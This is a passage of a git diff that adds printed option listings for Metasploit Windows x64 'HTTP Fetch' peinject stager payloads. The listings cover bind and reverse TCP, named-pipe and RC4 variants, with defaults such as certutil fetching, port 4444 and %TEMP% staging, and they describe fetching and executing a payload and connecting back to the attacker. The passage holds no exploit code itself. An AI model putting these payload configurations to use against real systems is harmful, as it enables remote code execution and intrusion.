thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME WvYarZcUgcRA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..30af1af --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,75 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME wFtpHzNT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_named_pipe.txt new file mode 100644 index 0000000..b21739d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_named_pipe.txt @@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/peinject/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME knEjtSYPro no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PE yes The local path to the PE file to upload +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp.txt new file mode 100644 index 0000000..8fa1206 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp.txt @@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/peinject/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME UrRCIdxTX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_rc4.txt new file mode 100644 index 0000000..d1a6c2b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_rc4.txt @@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/peinject/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME bPnyAVXBMa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_uuid.txt new file mode 100644 index 0000000..0a3c04b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_uuid.txt @@ -0,0 +1,75 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/peinject/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME rzacvWgTF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_named_pipe.txt new file mode 100644 index 0000000..2832096 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_named_pipe.txt @@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager + Module: payload/cmd/windows/http/x64/peinject/reverse_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME zEkvLUTxxl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +PE yes The local path to the PE file to upload +PIPEHOST . yes Host of the pipe to connect to +PIPENAME msf-pipe yes Name of the pipe to listen on + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker via a named pipe pivot + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp.txt new file mode 100644 index 0000000..4389278 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp.txt @@ -0,0 +1,81 @@ + + Name: HTTP Fetch, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/peinject/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME EocOJspe no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_rc4.txt new file mode 100644 index 0000000..575a435 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_rc4.txt @@ -0,0 +1,87 @@ + + Name: HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + ege + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZJnfcHNf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RC4PASSWORD msf yes Password to derive RC4 key from + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the 